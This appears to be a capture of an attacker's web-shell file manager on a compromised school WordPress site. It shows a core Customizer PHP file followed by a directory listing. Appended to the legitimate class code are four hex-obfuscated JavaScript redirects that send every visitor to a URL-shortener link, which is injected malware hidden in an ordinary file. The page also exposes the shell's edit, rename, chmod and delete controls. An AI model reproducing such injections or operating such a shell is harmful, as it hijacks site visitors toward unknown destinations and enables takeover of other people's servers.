Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
smpn11bpn.sch.id
/
wp-includes
/
customize
/
File Content:
class-wp-customize-cropped-image-control.php
<?php /** * Customize API: WP_Customize_Cropped_Image_Control class * * @package WordPress * @subpackage Customize * @since 4.4.0 */ /** * Customize Cropped Image Control class. * * @since 4.3.0 * * @see WP_Customize_Image_Control */ class WP_Customize_Cropped_Image_Control extends WP_Customize_Image_Control { /** * Control type. * * @since 4.3.0 * @var string */ public $type = 'cropped_image'; /** * Suggested width for cropped image. * * @since 4.3.0 * @var int */ public $width = 150; /** * Suggested height for cropped image. * * @since 4.3.0 * @var int */ public $height = 150; /** * Whether the width is flexible. * * @since 4.3.0 * @var bool */ public $flex_width = false; /** * Whether the height is flexible. * * @since 4.3.0 * @var bool */ public $flex_height = false; /** * Enqueue control related scripts/styles. * * @since 4.3.0 */ public function enqueue() { wp_enqueue_script( 'customize-views' ); parent::enqueue(); } /** * Refresh the parameters passed to the JavaScript via JSON. * * @since 4.3.0 * * @see WP_Customize_Control::to_json() */ public function to_json() { parent::to_json(); $this->json['width'] = absint( $this->width ); $this->json['height'] = absint( $this->height ); $this->json['flex_width'] = absint( $this->flex_width ); $this->json['flex_height'] = absint( $this->flex_height ); } } ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
admin.php
5362 bytes
0644
class-wp-customize-background-image-control.php
1970 bytes
0644
class-wp-customize-background-image-setting.php
1325 bytes
0644
class-wp-customize-background-position-control.php
3718 bytes
0644
class-wp-customize-code-editor-control.php
3003 bytes
0644
class-wp-customize-color-control.php
3752 bytes
0644
class-wp-customize-cropped-image-control.php
2145 bytes
0644
class-wp-customize-custom-css-setting.php
5974 bytes
0644
class-wp-customize-date-time-control.php
10132 bytes
0644
class-wp-customize-filter-setting.php
1274 bytes
0644
class-wp-customize-header-image-control.php
8716 bytes
0644
class-wp-customize-header-image-setting.php
2468 bytes
0644
class-wp-customize-image-control.php
1897 bytes
0644
class-wp-customize-media-control.php
10101 bytes
0644
class-wp-customize-nav-menu-auto-add-control.php
1808 bytes
0644
class-wp-customize-nav-menu-control.php
2814 bytes
0644
class-wp-customize-nav-menu-item-control.php
8843 bytes
0644
class-wp-customize-nav-menu-item-setting.php
28555 bytes
0644
class-wp-customize-nav-menu-location-control.php
2985 bytes
0644
class-wp-customize-nav-menu-locations-control.php
3503 bytes
0644
class-wp-customize-nav-menu-name-control.php
1817 bytes
0644
class-wp-customize-nav-menu-section.php
1402 bytes
0644
class-wp-customize-nav-menu-setting.php
19622 bytes
0644
class-wp-customize-nav-menus-panel.php
3995 bytes
0644
class-wp-customize-new-menu-control.php
1710 bytes
0777
class-wp-customize-new-menu-section.php
1693 bytes
0777
class-wp-customize-partial.php
11254 bytes
0644
class-wp-customize-selective-refresh.php
13754 bytes
0777
class-wp-customize-sidebar-section.php
1745 bytes
0644
class-wp-customize-site-icon-control.php
5859 bytes
0644
class-wp-customize-theme-control.php
12575 bytes
0644
class-wp-customize-themes-panel.php
4071 bytes
0644
class-wp-customize-themes-section.php
7641 bytes
0644
class-wp-customize-upload-control.php
1883 bytes
0644
class-wp-sidebar-block-editor-control.php
1372 bytes
0644
class-wp-widget-area-customize-control.php
2405 bytes
0644
class-wp-widget-form-customize-control.php
3332 bytes
0644
error_log
426 bytes
0644
index.htm
1092 bytes
0644
index.html
1092 bytes
0644
index.php
1092 bytes
0644
N4ST4R_ID | Naxtarrr